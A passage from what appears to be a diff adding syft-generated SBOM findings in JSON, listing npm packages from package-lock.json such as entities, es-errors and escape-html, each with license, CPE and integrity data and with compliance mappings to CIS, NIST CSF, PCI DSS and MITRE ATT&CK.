5.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b307d9bc2f957b2d", + "name": "engine.io-parser", + "version": "5.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/engine.io-parser@5.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz", + "integrity": "sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6de5b5b314bb1d48", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: entities 4.5.0", + "title": "entities 4.5.0", + "description": "Package discovered: entities 4.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3c365deec0186b44", + "name": "entities", + "version": "4.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-2-Clause", + "spdxExpression": "BSD-2-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/entities@4.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9ebfe3f940205a55", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: es-define-property 1.0.1", + "title": "es-define-property 1.0.1", + "description": "Package discovered: es-define-property 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "198a07fe3b41a7bb", + "name": "es-define-property", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/es-define-property@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ce987dda52f0c354", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: es-errors 1.3.0", + "title": "es-errors 1.3.0", + "description": "Package discovered: es-errors 1.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "524e10cb2d7467ea", + "name": "es-errors", + "version": "1.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/es-errors@1.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8e3c7c80273d6fd7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: es-object-atoms 1.1.1", + "title": "es-object-atoms 1.1.1", + "description": "Package discovered: es-object-atoms 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fa7ef7424a021d69", + "name": "es-object-atoms", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/es-object-atoms@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dependencies": { + "es-errors": "^1.3.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cdf746578205af98", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: es-set-tostringtag 2.1.0", + "title": "es-set-tostringtag 2.1.0", + "description": "Package discovered: es-set-tostringtag 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8f498e19379b53ea", + "name": "es-set-tostringtag", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/es-set-tostringtag@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3d860225864c56d0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: escalade 3.2.0", + "title": "escalade 3.2.0", + "description": "Package discovered: escalade 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2a58ccd5fc44a7b2", + "name": "escalade", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/escalade@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2f35769c64d37fb5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: escape-html 1.0.3", + "title": "escape-html 1.0.3", + "description": "Package discovered: escape-html 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "94fc6050cdb348bc", + "name": "escape-html", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/escape-html@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": 